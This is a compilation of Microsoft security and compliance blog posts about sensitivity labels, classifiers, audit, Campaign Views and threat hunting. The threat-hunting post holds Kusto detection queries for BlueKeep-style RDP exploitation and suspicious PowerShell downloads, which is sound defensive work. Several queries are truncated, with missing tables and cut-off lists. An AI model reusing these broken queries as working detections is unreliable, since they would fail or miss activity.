Microsoft Information Protection & Compliance Preview Programs

Microsoft Information Protection & Compliance Preview Programs

The following is provided from Microsoft Security and Compliance blogs at TechCommunity:

MIPC Previews.png

Welcome to the MIP and Compliance previews page!


Here you will find details of the various preview programs being managed by the MIP&C CXE team including the program status. This page won’t include upcoming preview programs so if you have any interest in working with us on new features as they are close to release make sure you register your interest:


We will be updating this page regularly with new webinars and resources so check back often!


Preview Programs

Category / Program

Brief Description

More Details

Preview Status

MIP: Trainable classifier auto-labeling with sensitivity labels

Create sensitivity labels and corresponding automatic or recommended labeling policies in Office apps using built-in classifiers


 MIP: O365 service-based auto-labeling for EXO (Data in transit) and SPO/OD (Data at rest)

Auto classification for Sensitivity Labels in OneDrive, SharePoint, and Exchange helps you automatically label or tag content as sensitive to ensure the configured protections are applied.



MIP: Using Sensitivity labels with Microsoft Teams, O365 Groups and SharePoint Online sites

When you create sensitivity labels in the M365 compliance center, you can now apply them to the following containers: Microsoft Teams sites, Office 365 groups, and SharePoint sites. Which provides you with additional policy settings which can be applied.




MIP: Office client support for sensitivity labels with user-defined permissions


Sensitivity labels that are configured to let users assign permissions will now appear in the Sensitivity picker in Office on Windows and Mac.




(Office Insiders) &

Rolling out to Monthly Channel

MIP: Office client support for automatic & recommended labeling

Office apps on Windows and web support recommending or automatically applying a sensitivity label based on sensitive terms contained in the content.


Word on Windows can also highlight and list the sensitive terms it detected in the canvas when a recommendation is shown.



Office on Windows:


(Office Insiders)


Office Online:

Public (opt-in)

MIP: Enable sensitivity labels for Office files in SharePoint and OneDrive.

Ability to apply sensitivity labels that include encryption to Office files stored in SharePoint and OneDrive, and the SPO service process the content of these files for Coauthoring, eDiscovery, Data Loss Prevention, search etc.


This also enables sensitivity labeling in the Office Online apps (Word, Excel, PowerPoint Online)



MIP: Understand Data Classification

After you apply your retention labels and sensitivity labels, you’ll want to see how the labels are being used across your tenant and what is being done with those items.





Thanks to those of you who have participated in our sessions so far. If you haven’t already, don’t forget to check out our resources available on the Tech Community.



@Adam Bell  on behalf of the MIP and Compliance CXE team

The above was provided from Microsoft Security and Compliance blogs at TechCommunity

Microsoft Information Protection and Compliance Webinar Page

The following is provided from Microsoft Security and Compliance blogs at TechCommunity:

Welcome to the MIP and Compliance webinar page!


Here you will find details of our upcoming webinars as well as resources for past webinars. We will be updating this page regularly with new webinars and resources so check back often!


Upcoming Public Webinars:

Category / Topic

Date & Time


Attendee Link

Compliance: Compliance score how-to

EMEA: Apr. 15, 2020 16:00 GMT

NA:  Apr. 15, 2020 12:00 PST





MIP: Exact Data Match (EDM) classification (What is EDM?)

EMEA: Apr. 22, 2020 16:00 GMT

NA: Apr. 22, 2020 12:00 PST






Recordings of Past Webinars:


Category: Topic



Mar. 17, 2020

MIP: Trainable classifiers



Mar. 10, 2020

Compliance: Insider Risk Management & Communications Compliance



Mar. 5, 2020

MIP: Using Sensitivity labels with Microsoft Teams, O365 Groups and SharePoint Online sites



Feb. 11, 2020

MIP: Know Your Data



Jan. 22, 2020

MIP: Introduction to SharePoint & OneDrive Auto-labeling



Jan. 15, 2020

MIP: Moving to unified labeling




Thanks to those of you who participated in our sessions so far. If you haven’t already, don’t forget to check out our resources available on the Tech Community.



@Adam Bell  on behalf of the MIP and Compliance CXE team

The above was provided from Microsoft Security and Compliance blogs at TechCommunity

Using Sensitivity labels with Microsoft Teams, O365 Groups and SharePoint Online sites

The following is provided from Microsoft Security and Compliance blogs at TechCommunity:

With the ability to label a SharePoint Online site, Teams site or O365 Group we’re introduced to the first capabilities of applying sensitivity labels to “containers”. Check out the webinar to understand how this works and how to use this in your organization.


This webinar was presented on Thu Mar 5th 2020, and the recording can be found here.


Attached to this post are:

  1. The FAQ document that summarizes the questions and answers that came up over the course of both Webinars; and
  2. A PDF copy of the presentation.

Thanks to those of you who participated during the two sessions and if you haven’t already, don’t forget to check out our resources available on the Tech Community.



@Adam Bell  on behalf of the MIP and Compliance CXE team

The above was provided from Microsoft Security and Compliance blogs at TechCommunity

Announcing automatic labeling in Office Apps using built-in classifiers – Limited Preview

Announcing automatic labeling in Office Apps using built-in classifiers – Limited Preview

The following is provided from Microsoft Security and Compliance blogs at TechCommunity:

I’m thrilled to announce limited preview of automatic sensitivity labeling in Office apps using built-in classifiers. As part of this preview, the Microsoft 365 Compliance Center will allow you to create sensitivity labels and corresponding automatic or recommended labeling policies in Office apps using built-in classifiers.


The six built-in classifiers that are available as part of this preview are :

  • Resume: detects written accounts of an applicant’s personal, educational, and professional qualifications and experience
  • Source code: detects a set of instructions and statements written in the top 25 computer programming languages of GitHub
  • Offensive language: detects text items that contain profanities, slurs, taunts, and disguised expressions (expressions that have the same meaning as more offensive terms)
  • Threat: detects a specific category of offensive language related to threat to commit violence or do physical harm/damage to a person/property.
  • Harassment: detects a specific category of offensive language related to offensive conduct targeting one or multiple individuals regarding race, color, religion, national origin, gender, sexual orientation, age, disability and genetic information.
  • Profanity: detects a specific category of offensive language that contains swear words or vulgar language.

The Office apps which will support automatic sensitivity labeling using the above classifiers include the following:

  1. Win32 apps (You need to be a part of the Office Insider Program)
    1. Word
    2. Excel Win32
    3. PowerPoint Win32
  2. Office Online Apps (Opt-in to this preview required)
    1. Word Online 
    2. Excel Online 
    3. PowerPoint Online 
    4. Outlook Web 

The subscription and license requirements for this preview are similar to what is needed to enable automatic sensitivity labels  in Office apps. You need one of Microsoft 365 E5, Office 365 E5 or Azure Information Protection Premium P2. For more details, see subscription and licensing requirements for sensitivity labels


Pre-requisites to start with built-in classifier-based auto-labeling

For the tenant in which you want to enable built-in classifiers backed sensitivity labeling in Office apps, you should have the following as pre-requisites : 

  1. Office online apps : To enable this in Office online apps, you will need to opt-in to this preview.
  2. Win32 apps : To enable this in Office Win32 apps, you will need to opt-in to Office Insiders program. You have the option to opt-in as an individual, a set of individuals, or a group to the Insider channel for testing.
  3. Once you have at least one of the above pre-requisites completed, you’ll  need to define at least one label for your tenant and a corresponding label policy to detect an out-of-box or custom sensitive information type.
  4. Follow the procedure described in the section “How to Opt-in to this Preview” below to express interest for this feature.

How to Opt-in to this Preview

To express interest in this preview, please fill out this form with your details and we’ll enable it for your tenant in 3 working days.


Testing asks

Testing of built-in classifiers

  1. Built-in classifiers that are already published may be tested through the flow of creating an auto-apply sensitivity label policy – please refer to the section “Creating auto-label policies” below on details of how to create a sensitivity label and a label policy.
  2. Feedback: We’d love to hear your feedback on how this feature is helping you with your use cases. We have put together a form that you can fill out for feedback.

Creating auto-label policies

Please follow the steps to create an auto-label policy which uses any of the built-in classifiers


  1. Make sure that at least one sensitivity label and a corresponding label policy already exists in your tenant to detect an out-of-box or custom sensitive information type.


  1. Go to Microsoft 365 compliance Center and click on Information Protection on the left navigation menu and then click “Create a Label”



  1. Enter the name, tooltip, and description for the label and then click on Next.



  1. You can then associate a built-in classifier with the label by adding a classifier as shown below.



  1. You can then choose which classifier to associate with the label. In this example we will use “Resume”.



  1. Choose whether you want to auto-apply or just recommend this label and provide an optional policy tip.

TIP : For the purpose of testing please use recommended labeling. Once you are satisfied with how the policies are working you can choose the auto-labeling option



  1. You should then see your label in the list of labels. Click on Label Policies to create one as the next step.



  1. Go to label policies and click on Publish Labels



  1. Choose the sensitivity label to be associated to the policy



  1. While testing please scope it to certain users or user groups

TIP: For the purpose of testing please restrict the scope of users to a limited set of users which can be expanded later



  1. Choose your policy settings and give a name and description to your label policy.



  1. You should be able to see your label policy in the list of label policies



  1. Depending on the label settings, you can now see file detections like the following below as files are detected as matches for trainable classifiers, where a policy tip appears. Please note that it takes upto 24 hours for the policy to be synced across all the apps after policy creation.




Helpful Feedback

Throughout the process of testing built-in classifiers and label application across Office apps, your feedback on the following would be helpful:

  • Usability feedback
    • Feedback on the experience all-up
  • Feedback on using these classifiers in the auto-apply or recommended label policy
    • Are labels being /recommended to documents that match the category of the classifier (resume, source code, etc)?
    • Is label recommendation/auto-application accurate and quick?

We have published a form that you can fill to send us your valuable feedback.


For more information on Microsoft security solutions visit our website at or visit our security blog


The above was provided from Microsoft Security and Compliance blogs at TechCommunity

Threat hunting simplified with Microsoft Threat Protection

Threat hunting simplified with Microsoft Threat Protection

The following is provided from Microsoft Security and Compliance blogs at TechCommunity:


While well-funded and highly organized security operations teams often have the most sophisticated detection mechanisms in place, these teams still need experts that can run guided investigations to locate and stop certain threats. For example, sophisticated attackers often live off the land, taking advantage of normal system functionality that leaves almost no identifiable traces. While behavior-based detection algorithms powered by machine learning and AI can learn and respond quickly, human experts remain extremely valuable, especially if they know the network and are familiar with how attacks might play out.


What is threat hunting?

Cyberthreat hunting or simply threat hunting is a proactive cybersecurity activity that aims to find threats that are either buried under massive quantities of security signals and alert data or are simply not flagged by security products. It is generally a manual process, although great tools that we will describe in this article can make the process much less tedious and time-consuming.


During threat hunting, SecOps practitioners apply threat intelligence takeaways, whether from their own internal research or external research, and devise ingenious ways to determine the existence of an otherwise undetected threat. To do that, they need efficient access to comprehensive data about events and entities in their network as well as a good, quantifiable understanding of normal states or baselines.


Threat hunting lets analysts work with established baselines and highlight behavior that might be interesting. With the right tools, analysts can tailor their threat hunting activities to their environments and the threats that they will likely encounter. For instance, they can hunt for unusual behavior—like unexpected network connections—that might indicate that an in-house app or an account has been compromised.


The process of establishing the baselines themselves can also be part of threat hunting. To be able to do this, analysts need tools that can look backwards and forwards in time quickly, providing data that is sufficiently granular for defining normal states.


Effective threat hunting relies on:


cloud.png Comprehensive, well-structured, and retrievable event and system data
ai.png Threat intelligence: knowledge about threat actors or actor infrastructure, methodologies, and indicators
clock.png Granular baseline information that represents normal activity and states


Threat hunting example


jessica.png Let’s look at what Jessica, our fictional but awesome SecOps person, might go through:


  1. Jessica, who works for Contoso Health Services, finds out about a new vulnerability that affects one of the product suites in her environment. In this case, the attacks are against a known web content management system (CMS).
  2. After doing some more research online, she determines that, because the release of this vulnerability is so recent, it is unclear how attackers might be able to leverage it in her environment. She also knows that a patch to remedy the issue is not yet available.
  3. She creates a query for behaviors tied to the processes involved in this vulnerability to determine existing baseline and normal behavior. She then modifies queries to return only what would not be expected.
  4. Jessica also creates rules so that the queries run regularly and send her notifications whenever there are matches.
  5. Because Jessica did her research and constructed her queries very well—carefully considering the possibility that some unaffected machines might exhibit threat-like behavior—each match to her query constitutes a viable threat-hunting find. These matches include unusual process activity that might very well be actual attempts to abuse the vulnerable CMS.

Clearly, Jessica’s finds can benefit Contoso Health Services by proactively locating exploitation attempts against an unpatched vulnerability. Likewise, her ability to efficiently design and deploy proactive defenses highlights her own capabilities as a defender.


Data is key

With cloud-based storage and compute solutions, we can now easily collect massive quantities of data. But as we store larger data sets, there is a growing need to be able to efficiently manipulate and make sense of them.


Microsoft Threat Protection itself is made possible by the power of the Azure cloud coupled with insights from the Intelligent Security Graph. In the background, massive amounts of threat intelligence and security data from across Microsoft’s portfolio are crunched and matched against indicators, expert human rules, and machine learning (ML) algorithms in Microsoft AI. This process generates meaningful alerts, identifying threat components and activities that automated investigation and response (AIR) capabilities remediate.


For example, Microsoft Threat Protection distinguishes between malicious and normal attempts to write to the registry by looking at millions of examples of registry writes and their contexts: the files or processes involved, file pedigrees, whatever was written to the registry, the time the writes were performed, and so on. With this much baseline info, the AI can confidently raise alerts and start performing remediation activities, rapidly placing harmful registry modifications and associated files in quarantine.


While AI and other automated systems are particularly effective at finding threats, human intuition and flexibility can still beat them when dealing with highly specialized or unusual scenarios. What human analysts need, however, are tools that let them:


  • Effectively access and handle large sets of data — while the interface is easy-to-use, the tool also needs to be responsive and must label and organize data well. At the same time, log storage must be as straightforward as any competitive cloud-based storage and compute solution that can be deployed and scaled without professional system integrators and other specialists.
  • Automate monitoring of interesting matches to new data — going back to Jessica’s fictional investigation, the tools should let her monitor new activities for matches to the attack activities she has modeled. Without this automation, Jessica will be tied to her chair, constantly looking for matches as new data comes in.


Cross-product advanced hunting with Microsoft Threat Protection

With advanced hunting in Microsoft Threat Protection—available in the Microsoft 365 security center with a valid license (go here to get started)—you can deep dive and hunt across data from various workspaces in your Microsoft 365 environment. Advanced hunting initially covers both your endpoints and your Office 365 email. By the end of March 2020, we will expand the schema to cover identity- and app-related signals from Azure ATP and Microsoft Cloud App Security.


You can work with Kusto queries, plus you have the convenience of switching to richer views made possible by the various integrated solutions. For example, you can drilldown from a query to dedicated pages with comprehensive contextual information about specific alerts, devices, users, domains, IP addresses, and even software vulnerabilities.


The specialized data set is organized in a manageable schema covering security-sensitive event and entity information, such as device info, network configuration info, process events, registry events, logon events, file events, and email events.


Microsoft will continually incorporate more information into this schema. Here are a few examples of the sophisticated threat hunting activities you can perform with the current coverage.


Identify vulnerable devices

With advanced hunting, you can access software inventory information from Threat & Vulnerability Management. Imagine being able to write queries that check for possible exploitation behavior on devices running vulnerable software.


The following sample query locates machines affected by the RDP vulnerability CVE-2019-0708—popularly known as “BlueKeep”—and checks for actual RDP connections initiated by unexpected executables:


let BlueKeepVulnerableMachines = DeviceTvmSoftwareInventoryVulnerabilities 
| where CveId == "CVE-2019-0708"
| distinct DeviceId;
// Find unusual processes on Windows 7 or Windows Server 2008 machines with
// outbound connections to TCP port 3389
let listMachines = DeviceInfo
| where OSVersion == "6.1" //Win7 and Srv2008
| distinct DeviceId;
| where DeviceId in(BlueKeepVulnerableMachines)
| where RemotePort == 3389
| where Protocol == "Tcp" and ActionType == "ConnectionSuccess"
| where InitiatingProcessFileName !in~ //Removing expected programs
("mstsc.exe","RTSApp.exe", "RTS2App.exe","RDCMan.exe","ws_TunnelService.exe",
"spiceworks-finder.exe","FSDiscovery.exe","FSAssessment.exe", "chrome.exe",
"microsodeedgecp.exe", "LTSVC.exe", "Hyper-RemoteDesktop.exe", "", "RetinaEngine.exe",
"AuvikService.exe", "AuvikAgentService.exe", "CollectGuestLogs.exe",
"NetworkWatcherAgent.exe", "MobaRTE.exe", "java.exe", "mscorsvw.exe", "MultiDesk.exe",
"Microsoft Remote Desktop", "javaw.exe", "ASGRD.exe", "MultiDesk64.exe", "Passwordstate.exe")
| join listMachines on DeviceId
| project Timestamp, DeviceId, DeviceName, RemoteIP, InitiatingProcessFileName,
InitiatingProcessFolderPath, InitiatingProcessSHA1
| summarize conn=count() by DeviceId, InitiatingProcessFileName, bin(Timestamp, 1d)


Hunt for threats that land by email and impact devices

You can also run queries that track threats that might have arrived through email and then traversed your endpoints. For example, this simple query checks for files from a known malicious email sender:


//Get prevalence of files sent by a malicious sender in your organization
| where SenderFromAddress =~ ""
| where isnotempty(SHA256)
| join (
| project FileName, SHA256
) on SHA256

Read more about hunting on devices and email


Start simple, learn fast

There’s no need to get intimidated by the query interface as the Kusto Query Language is straightforward. It has very powerful data manipulation capabilities that can be learned with more experience, but it takes only a few minutes to begin running simple queries, like locating a file SHA mentioned in the Twitter feed of your favorite security researcher.


Once you are there, you can easily look deeper into an instance of the SHA on a specific device or grab a list of all the devices with that SHA and look for commonalities between those devices. Again, it does not hurt that you have other Microsoft Threat Protection features, such as file and machine profile pages, at your disposal.


Advanced hunting is backed by a strong community of experienced security practitioners and Kusto Query Language users who are ready to share expertise so that you can easily learn a new syntax. You will find many blog posts in the Microsoft Defender ATP Tech Community discussing various query techniques. You could also explore the Microsoft Threat Protection repository or the Microsoft Defender ATP repository for queries covering various known threat campaigns and techniques.

Soon enough, you’ll be creating custom detection rules—available by the end of March 2020 with Microsoft Threat Protection—from your hunting queries. These detection rules automatically check for and respond to various events and system states, including suspected breach activity and misconfigured machines.


Try it yourself

It’s time to try advanced hunting for yourself! If you believe PowerShell download activity in your network is likely suspicious, give the query below a try.


// Finds PowerShell execution events that could involve a download
union DeviceProcessEvents, DeviceNetworkEvents
| where Timestamp > ago(7d)
// Pivoting on PowerShell processes
| where FileName in~ ("powershell.exe", "powershell_ise.exe")
// Suspicious commands
| where ProcessCommandLine has_any("WebClient",
| project Timestamp, DeviceName, InitiatingProcessFileName, InitiatingProcessCommandLine,
FileName, ProcessCommandLine, RemoteIP, RemoteUrl, RemotePort, RemoteIPType
| top 100 by Timestamp


Want to explore this query further and understand how it might catch malicious activity? Learn how this query works


Hunt across your entire environment with Azure Sentinel

The advanced hunting capabilities in Microsoft Threat Protection enable you to find threats across your users, endpoints, email and productivity tools, and apps. You can integrate the data from Microsoft Threat Protection into Azure Sentinel and then expand that dataset to include data from Azure Security Center and third-party security products to find threats that span your entire environment.


Azure Sentinel provides cloud-native SIEM capabilities, including AI that fuses multiple alerts to a complete attack chain. For example, it can take an alert from Microsoft Threat Protection and combine that with an alert from a third-party firewall. You can then visualize that attack chain or use Kusto Query Language to query across the full set of security data and then remediate the issue and put in place an automated solution with Azure Logic Apps.


Louie Mayor & Justin Carroll

Microsoft Threat Protection team

The above was provided from Microsoft Security and Compliance blogs at TechCommunity

Microsoft Partners with Terranova Security for Security Awareness Training

The following is provided from Microsoft Security and Compliance blogs at TechCommunity:

Microsoft is pleased to announce a strategic partnership with Terranova Security to provide world-class security training to end users. Through this partnership, we will address our customers’ most significant risk vectors – phishing driving risky end user behaviors. After a multi-month search across the industry, we chose to team up with Terranova Security because we believe that our partnership will enable us to deliver unique and highly differentiated value to our customers.


Users falling prey to phishing is one of the most common, impactful risks facing our customers today. Microsoft’s partnership with Terranova Security enables us to deliver an industry-leading solution with differentiated phishing simulation and human-centric training .

Rob Lefferts, Corporate Vice President, Microsoft 365 Security


Microsoft’s technology and platform enriches us with intelligent insights to develop security awareness training on the most recent and relevant risks. This partnership empowers Terranova Security to provide human-centric security training at maximum scale and efficacy.  

Lise Lapointe, CEO, Terranova Security


​We chose Terranova Security for their human-centric approach, which draws on principles of behavioral science to create training content that demonstrably changes user behavior, their comprehensive content catalog which will allow customers to customize training based on context and behavior patterns, and their demonstrated commitment to diverse and inclusive .

Started in 2001, Terranova Security brings together technology and education, twin passions of the founder, to create a unique interdisciplinary approach to security awareness training. The emergent need for user training that sparked the journey has since evolved. Today, the market looks to Terranova Security’s leadership and CEO Lise Lapointe’s book is the go-to text for designing effective security awareness programs.  The pedagogical consistency of Terranova Security’s content will empower our customers to deliver effective, engaging phish training to all their users as well as measure its efficacy.


Terranova Security’s catalog impresses not only in its intellectual quality and engaging experience, but also in its comprehensive breadth. It provides the most enterprise-ready library of content in the marketplace, featuring trainings of every duration, covering all the social engineering variants across the spectrum. This allows Microsoft to leverage insights from our email threat protection solution, Office 365 Advanced Threat Protection (Office 365 ATP) to personalize phish training—delivering the right training to the right users at the right time for maximum efficacy. The automation and integration built into Office 365 Advanced Threat Protection will leverage and target phish training content to deliver a seamless, context-aware and engaging user experience for all our customers. Insights generated will flow into analytics and recommendations that will help our customers customize and differentiate phish training for maximum effect within their organizations. The market has outgrown one-size-fits-all solutions, and end users expect interactive, engaging content that adapts to their learning needs. Terranova Security meets this.


Finally, both Terranova Security and Microsoft share a commitment to diverse and inclusive practices. Terranova Security builds inclusion into their boardroom, their content and their products and services. Terranova Security’s content library is available in 40 different languages, enabling training across geographies and . Further, Terranova Security’s content will meet Level A Success Criteria of the Web Content Accessibility Guidelines Version 2.1, the highest bar of accessible content available. All of this means that any organization in the world will be able to benefit from this security awareness training content. Microsoft strives to serve customers from all over the world, with different perspectives and needs. Terranova Security’s focus on diversity and inclusion bolsters our ability to deliver industry-leading experiences for all our customers.


We believe that this partnership will enable us to address our customer’s most significant and impactful risk vectors: phishing driving risky end user behaviors.  The combination of Microsoft technology to target the right training at the right coupled with Terranova Security’s human-centric approach will deliver an industry-leading phishing simulation and training experience. The solution will raise the efficacy bar for phishing training to new heights and will shift your users from being part of the problem to the solution.

The above was provided from Microsoft Security and Compliance blogs at TechCommunity

Announcing GA of O365 ATP Campaign Views and Compromised User Detection and Response

Announcing GA of O365 ATP Campaign Views and Compromised User Detection and Response

The following is provided from Microsoft Security and Compliance blogs at TechCommunity:

Today, I’m thrilled to announce the general availability of two extremely popular and valuable features in the Office 365 Advanced Threat Protection offering: Campaign Views and Advanced Compromised user detection and response. These features together greatly amplify the protection of organizations by helping security teams detect compromised users sooner, identify configuration weaknesses faster and improve security posture. And they also help reduce the scope of impact of breaches by giving security teams the tools to respond quickly.


Campaign views:



When we released Campaign Views into public preview a few months ago, we already knew it was an extremely popular and useful capability for security teams, based on the overwhelmingly positive feedback from our close design customer partners. Campaign views offer security teams the full story of how attackers targeted the organization and its users and how their defenses held up (or not).

Security teams can quickly:

  • See summary details about the campaign, including when the campaign started, the sending pattern and timeline, how big the campaign was and how many users fell prey to it.
  • See the list of IP addresses and senders used to orchestrate the attack.
  • Assess which messages were blocked, ZAPped, delivered to junk or quarantine, or allowed into the inbox.
  • See all the URLs that were manifested in the attack
  • Learn if there are users that have fallen prey to any attacks and clicked on the phish URL.

Armed with the information above security teams can more effectively and efficiently:

  1. Remediate compromised/vulnerable users
  2. Improving security posture by eliminating configuration flaws seen
  3. Investigate related campaigns that use the same indicators of compromise
  4. Hunt and track threats that use the same indicators of compromise


Amazing feedback:

Over the past few months, in public preview we’ve had extremely positive feedback on the feature.

“Being able to piece together the big picture of phishing attacks spread out over multiple days and with subtle changes in tactics of the campaigns, is extremely powerful”

“I’ve now started using this as one of the starting points for my hunting and investigation. And I keep coming back every few days to see what’s new and what I need to focus on”

Comments like the above are music to our ears and we’ve been hearing it from many customers that have been using Campaign Views in preview.


Tangible value:

It is no wonder that customers love this feature. Just consider the following stories.

For one large customer, visibility into the complexity of a small number of recurring, detected campaigns helped them identify and understand a set of persistent, targeted attacks against a specific R&D department.

Another tenant prioritized a full review of their decade-old configuration settings after they saw a campaign that completely bypassed filtering and allowed message delivery into their organization. It turns out that the campaign was allowed by a previously unknown and unrecognized Exchange mail flow rule (also known as a transport rule or ETR).

As we engage with customers, we continue to hear stories like this that make using campaign views as part of the SecOps workflows extremely compelling.


Additional improvements:

As part of the GA release we’ve also made additional improvements to Campaign views.

Improved discoverability: Campaign views are a separate node in the left navigation panel of the O365 Security and Compliance portal under ‘Threat Management’.




Expanded search and investigation capabilities: We’ve made it easier to search across campaigns. For example, you can search for all campaigns that targeted a specific recipient (for example, your company’s CEO) or campaigns related to a particular email (search for subject keywords or the specific messageID).



More campaign details: For each campaign, more included more information is presented.

  • Click-rate: As a way to measure the effectiveness of the campaign (from an attackers perspective), or in other words the impact of the campaign on the organization, we now show off a click-rate. Click-rate shows the percentage of Inbox’ed messages (messages delivered to the Inbox) that received a click from the recipient. This is an indirect measurement how effective and convincing the social engineering aspect of the campaign was.Girish_Chander_3-1582270578987.png



  • Authentication details: Within the Campaign view, we show expanded authentication details: all email authentication protocols (SPF for sending IPs, DKIM and DMARC for senders). Authentication failures identify attackers that are spoofing senders. Passing these authentication checks indicates a legitimate email sending infrastructure is being used for these attacks (for example, compromise or abusive activities that would require different action plans).



Campaign Views is GA!

Campaign Views will be immediately available to all customers with Office 365 ATP P2 and Office 365 E5 subscriptions. We encourage you to start using this powerful new set of capabilities to understand, mitigate and remediate phishing attacks. To learn more, see Campaign Views in Office 365 ATP.



Advanced Compromised user detection and response:





User accounts continue to have immense value for attackers. By compromising an account the attacker gains a foothold into the organization, using which they look to proliferate the attack, build avenues for the delivery of additional spam and phish campaigns, target additional users within the organization, steal sensitive data, or hold the organization to ransom.

This is why organizations need a sound protection strategy that focuses not only on prevention, but also early detection and response of account compromise and breaches.

The attacker’s activities when using a compromised account are often atypical or anomalous relative to the user’s regular behavior. For instance, there is no good reason for trusted users to be sending any phish or spam emails to other recipients. Being able to detect anomalies in user activity is therefore a key signal source for detection.

A few months ago, we released several features to detect anomalies in user activity to expand on our detection of user compromise. And we also released into preview a compelling automated playbook to automatically investigate such threats to help security teams more effectively and comprehensively detect the source and impact of the compromise and take remediation actions.


Amazing impact:

The power of these new capabilities has been immediately apparent. In the past few months, we’ve seen a 5x increase in the number of user compromises detected and responded to by customers using this feature.

If you consider the average cost of a data breach to organizations (~$4M globally, per some studies), with estimates being higher in certain geographies (some estimates reaching as high as $10M in regions like the US), any time security teams can detect and respond to compromised users faster and prevent costly data-breaches, is a critical win for the organization, their employees, their partners and customers.


Continuous stream of improvements:

As a lead up to GA, we’ve also been working to continually expand and tun our detections to more accurately detect compromise, highlight exfiltration of data and improve the efficiency of SecOps teams. While this GA announcement marks a compelling checkpoint to leverage this feature more confidently, we’ll continue to expand on the types of detections and SecOps capabilities we’ll introduce into this feature.


Compromise user detection and response is GA!

The compromise detections and alerts are available to all customers. The advanced automated playbooks for automatic investigation and response of compromised users for a more effective and efficient analysis of the cause and impact of the compromise is generally available today to all customers with Office365 ATP P2 and Office365 E5 subscriptions. We encourage you to start using this powerful new set of capabilities to stop attack kill-chains early and reduce the impact and scope of breaches. To learn more, see the documentation related to compromised user response



Try it for yourself!


If you’ve not checked out these capabilities yet, I strongly encourage you to do so. The combination of campaign views and compromise user detection and response helps reduce the scope of impact of breaches by giving security teams the tools to detect compromised users sooner, identify configuration weaknesses easily, respond faster and more effectively and improve security posture. Go on, give it a try. We’d love to hear what you think.




The above was provided from Microsoft Security and Compliance blogs at TechCommunity

Power faster and more effective forensic and compliance investigations

Power faster and more effective forensic and compliance investigations

The following is provided from Microsoft Security and Compliance blogs at TechCommunity:

We are pleased to share that Advanced Audit for Microsoft 365 is now rolling out. The new set of capabilities are aimed to power faster and more effective forensic compliance investigations.


These updates include:

  • Extending the preservation of a user’s audit activities from 90 days to 1 year
  • Increasing bandwidth access to the Management Activity API
  • Access to crucial events for investigations

Longer-term retention

Currently, audit logs are retained for 90 days by default. With Advanced Audit you are now able to retain audit logs for more than 90 days and up to 1 year for eligible users.


To apply the custom retention policy, within the audit log search, you can create a new retention policy and choose the appropriate duration within the UI or through cmdlets. You can also add more policies or customize existing ones. More details are available here.


[Image: Add a new retention policy for an individual user’s audit log activities for up to 1 year][Image: Add a new retention policy for an individual user’s audit log activities for up to 1 year]


Faster access to data

In the past, customers consuming logs through the Office 365 Management Activity API were limited by throttling limits at the publisher level, which means that for a publisher pulling data on behalf of multiple customers, the limit was shared by all those customers.


With this release, we are moving from publisher-based to tenant-based limits so each tenant will get their fully allocated bandwidth quota to access their auditing data. The bandwidth will be determined by a combination of factors including the number of seats in the tenant and their license subscription.


All tenants will start with a baseline of 2,000 requests per minute and will go up depending on their seat count, and E5 customers with Advanced Audit will get more bandwidth than non-E5 customers to provide faster access to data. Note that there will also be an upper cap for bandwidth to protect the health of the service. You can learn more from our documentation here.


Access crucial events for investigations

With Advanced Audit, one of the first events we are releasing is MailItemsAccessed. With this new event, access of data over mail protocols/clients will be audited to help investigators better understand scope of compromise.


The new MailItemsAccessed action is exposed as a part of Exchange Mailbox Auditing and is enabled by default. You can learn more from our documentation here.


[Image: users can now see audit activity such as the MailItemsAccessed event][Image: users can now see audit activity such as the MailItemsAccessed event]


Get Started

For Microsoft 365 E5 customers, Advanced Audit is rolling out over the next few weeks. You can also sign up for a trial or navigate to the Microsoft 365 compliance center to get started today. 


Learn more about what’s new with Advanced Audit and how to configure policies in your tenant in this supporting documentation. We look forward to hearing your feedback.

The above was provided from Microsoft Security and Compliance blogs at TechCommunity

[UPDATED]  Introducing remote deployment guidance for Microsoft Defender ATP and Office 365 ATP

[UPDATED] Introducing remote deployment guidance for Microsoft Defender ATP and Office 365 ATP

The following is provided from Microsoft Security and Compliance blogs at TechCommunity:

In today’s heterogeneous environments, security is becoming more and more complex. Customers are facing a growing attack surface and need help speeding up deployment of their protection tools at scale. To help security teams address these complexities and better protect, detect and respond to threats faster, we are excited to announce Microsoft FastTrack remote deployment guidance for Microsoft Defender Advanced Threat Protection (ATP), our unified endpoint security platform for proactive threat protection, post-breach detection, automated investigation, and response. We are also announcing an expanded FastTrack scope for Office 365 Advanced Threat Protection, which protects customers against sophisticated threats like phishing and malware with automated investigation and remediation.


Microsoft Defender ATP and Office 365 ATP are two critical components of the suite of Microsoft security products that work seamlessly together to provide protection across the entire attack kill chain, using built-in intelligence from the Microsoft Intelligent Security Graph to protect identities, email, applications, endpoints, and data from evolving threats.




At Microsoft, we are fully committed to helping customers realize the value of our Microsoft 365 security solutions by deploying them more quickly to address their business needs. FastTrack is responsible for making this commitment a reality by advising and supporting customers during the deployment of their technologies. We are now expanding the support we already provide for securing identities to email and endpoints with remote deployment guidance for customers that want to leverage advanced tools to secure their email and endpoints. Together, identity, email and endpoints represent the three most common entry points for attackers.


Microsoft FastTrack enables customers to deploy Microsoft 365 security solutions at no additional cost for eligible subscriptions in North America. FastTrack has an engagement model built on learnings and expertise gained through engineering work with more than 60,000 customers since 2014. We use and share these best practices as part of a deployment process that enables customers to onboard to new services quickly and reliably.


The FastTrack team provides remote guidance, engaging directly with customers or partners. This is an ongoing benefit throughout the life of the subscription, delivered by Microsoft and approved partners.


To request assistance, visit

The above was provided from Microsoft Security and Compliance blogs at TechCommunity

How to prevent and expose “unknown unknown” threats

How to prevent and expose “unknown unknown” threats

The following is provided from Microsoft Security and Compliance blogs at TechCommunity:


Check out the joint Microsoft and Morphisec webinar next Tuesday, November 19, at 10am EST where two rockstar women in cybersecurity will show you how to how to prevent and expose “unknown unknown” threats through an integration with Morphisec’s Moving Target Defense and Microsoft Defender ATP.


To register and learn more, click here


Looking forward to seeing you next week!

The above was provided from Microsoft Security and Compliance blogs at TechCommunity